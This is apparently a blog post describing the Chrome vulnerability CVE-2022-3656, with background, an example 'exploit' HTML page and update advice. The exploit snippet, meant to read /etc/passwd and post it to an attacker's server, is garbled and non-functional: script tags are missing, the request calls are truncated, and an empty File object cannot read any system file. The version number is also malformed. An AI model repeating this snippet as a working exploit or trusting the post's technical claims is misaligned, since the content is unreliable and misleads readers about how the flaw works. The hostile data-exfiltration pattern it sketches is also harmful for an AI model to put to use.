In this post, we will delve into the vulnerability identified as CVE-2022-3656 which affects Google Chrome versions prior to 107..5304.62. This security flaw revolves around insufficient data validation in the file system component of Google Chrome and permits remote attackers to bypass file system restrictions using a specifically crafted HTML page. The Chromium project has labeled this vulnerability's security severity as Medium.

Before we proceed with the details, let's take a moment to understand what insufficient data validation means and its implications. Essentially, it is a software weakness that occurs when inadequate or no validation is performed on user inputs and external data before processing or storing it in a system. This can lead to various security issues such as bypassing access control, causing system crashes, or executing malicious code by exploiting the vulnerabilities within the affected system.

The following sources provide in-depth information about the CVE-2022-3656 vulnerability

1. Google Chrome Releases Blog
2. Chromium Security Bugs
3. National Vulnerability Database - CVE-2022-3656

Exploit Details

The exploit against Google Chrome's file system restrictions using the CVE-2022-3656 vulnerability involves creating a purposefully designed HTML page containing malicious code. When a victim visits this webpage on a vulnerable version of Google Chrome, an attacker can exploit the insufficient data validation issue in the file system component, allowing them to access sensitive information or execute unauthorized actions.

Let's take a look at an example of how the crafted HTML page may contain the malicious code

<!DOCTYPE html>
  <title>CVE-2022-3656 Exploit</title>
    function exploit() {
      // The following sample code creates a new FileReader instance, which will be used to read the content of a file:
      let reader = new FileReader();
      reader.onload = function(e) {
        // The resulting data is sent to the attacker's server:
        let xhr = new XMLHttpRequest();"POST", "";);

      // The FileReader instance attempts to read the restricted file, exploiting the vulnerability:
      reader.readAsText(new File([""], "/etc/passwd"));
  <button onclick="exploit()">Execute Exploit</button>

The above HTML snippet demonstrates a simple example of how an attacker might exploit the CVE-2022-3656 vulnerability in a vulnerable version of Google Chrome. When a user clicks on the "Execute Exploit" button, the malicious function exploit is triggered. It creates a FileReader instance that attempts to read a sensitive file, /etc/passwd, leveraging the insufficient data validation flaw. If the exploit is successful, the attacker will receive the contents of the targeted file, allowing unauthorized access to sensitive information.

Mitigation and Prevention

The best way to protect yourself from the CVE-2022-3656 vulnerability is to update Google Chrome to version 107..5304.62 or later. This eliminates the insufficient data validation bug present in earlier versions and ensures the safety of your data and system.

Additionally, you should be cautious when browsing unknown websites or clicking on suspicious links, as these can expose you to a wide range of security threats, including other vulnerabilities that may affect your system.


In conclusion, CVE-2022-3656 demonstrates the importance of data validation within a software system, as it plays a crucial role in maintaining security and preventing unauthorized access. By updating your Google Chrome version and keeping a watchful eye on your online activities, you can minimize the chances of being affected by this vulnerability, ensuring a safer browsing experience.


Published on: 11/01/2022 23:15:00 UTC
Last modified on: 11/10/2022 00:15:00 UTC